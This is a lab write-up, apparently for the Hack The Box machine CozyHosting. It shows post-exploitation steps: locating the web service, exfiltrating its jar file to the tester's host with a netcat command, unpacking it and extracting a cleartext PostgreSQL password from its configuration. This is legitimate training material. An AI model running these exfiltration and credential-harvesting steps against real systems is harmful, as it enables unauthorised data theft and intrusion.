InfoSec LAB

CozyHosting_Cozy_Cloud

Created: 3 min read

Cozy Cloud

Checking the source of the target web application after performing basic enumeration

app@cozyhosting:/app$ find / -name cozy* -ls 2>/dev/null
   280132      0 lrwxrwxrwx   1 root     root           39 may 18 15:01 /etc/systemd/system/multi-user.target.wants/cozyhosting.service -> /etc/systemd/system/cozyhosting.service
   280107      4 -rw-r--r--   1 root     root          287 may 18 13:52 /etc/systemd/system/cozyhosting.service
     2497      0 drwxr-xr-x   2 root     root            0 sep  9 12:37 /sys/fs/cgroup/system.slice/cozyhosting.service
app@cozyhosting:/app$ find / -name cloud* -ls 2>/dev/null
      121  58848 -rw-r--r--   1 root     root     60259688 aug 11 00:45 /app/cloudhosting-0.0.1.jar

PEAS earlier picked up the service information regarding the web application; cozyhosting.service

Service

app@cozyhosting:/app$ cat /etc/systemd/system/cozyhosting.service
[Unit]
Description=Cozy Hosting Web Page
After=syslog.target network.target
 
[Service]
SuccessExitStatus=143
 
User=app
Group=app
 
Type=simple
 
WorkingDirectory=/app
ExecStart=/usr/bin/java -jar cloudhosting-0.0.1.jar
ExecStop=/bin/kill -15 $MAINPID
 
[Install]
WantedBy=multi-user.target
 
app@cozyhosting:/app$ ll
total 58M
4.0K drwxr-xr-x  2 root root 4.0K Aug 14 14:11 .
4.0K drwxr-xr-x 19 root root 4.0K Aug 14 14:11 ..
 58M -rw-r--r--  1 root root  58M Aug 11 00:45 cloudhosting-0.0.1.jar

I will transfer the source file to Kali for further enumeration

app@cozyhosting:/app$ nc 10.10.14.4 2222 < cloudhosting-0.0.1.jar
 
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ nnc 2222 > cloudhosting-0.0.1.jar
listening on [any] 2222 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.230] 32864

Transfer complete

Source

┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ 7z x cloudhosting-0.0.1.jar        
 
7-zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,32 CPUs 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz (806D1),ASM,AES-NI)
 
scanning the drive for archives:
1 file, 60259688 bytes (58 MiB)
 
extracting archive: cloudhosting-0.0.1.jar
--
Path = cloudhosting-0.0.1.jar
Type = zip
Physical Size = 60259688
 
Everything is Ok                                                    
 
folders: 46
files: 265
size:       99339843
compressed: 60259688

Extracting the content

┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ ll
total 58M
4.0k drwxr-xr-x 5 kali kali 4.0k sep  9 23:51 .
 58m -rw-r--r-- 1 kali kali  58m sep  9 23:51 cloudhosting-0.0.1.jar
4.0k drwxr-xr-x 3 kali kali 4.0k sep  9 23:51 ..
4.0k drwxr-xr-x 4 kali kali 4.0k aug 10 23:22 BOOT-INF
4.0k drwxr-xr-x 3 kali kali 4.0k aug 10 23:22 META-INF
4.0K drwxr-xr-x 3 kali kali 4.0K Jan 31  1980 org
 
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ ll BOOT-INF 
total 24K
4.0k drwxr-xr-x 5 kali kali 4.0k sep  9 23:51 ..
4.0k -rw-r--r-- 1 kali kali 3.2k aug 10 23:22 classpath.idx
4.0k -rw-r--r-- 1 kali kali  212 aug 10 23:22 layers.idx
4.0k drwxr-xr-x 2 kali kali 4.0k aug 10 23:22 lib
4.0k drwxr-xr-x 4 kali kali 4.0k aug 10 23:22 .
4.0k drwxr-xr-x 5 kali kali 4.0k aug 10 23:22 classes
 
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ ll BOOT-INF/classes
total 24K
4.0k drwxr-xr-x 5 kali kali 4.0k aug 10 23:22 .
4.0k drwxr-xr-x 4 kali kali 4.0k aug 10 23:22 ..
4.0k drwxr-xr-x 3 kali kali 4.0k aug 10 23:22 htb
4.0k drwxr-xr-x 2 kali kali 4.0k aug 10 23:22 templates
4.0k -rw-r--r-- 1 kali kali  551 aug 10 23:22 application.properties
4.0k drwxr-xr-x 3 kali kali 4.0k aug 10 23:22 static

While there are a lot of content inside, I will check the application.properties file

CLEARTEXT Credential

┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ cat BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

The web application indeed uses the PostgreSQL as a backend DB over 127.0.0.1:5432 Additionally, there is a CLEARTEXT credential; postgres:Vg&nvzAQ7XxR This would allow me to enumerate the PostgreSQL instance

Interactive Graph View

Backlinks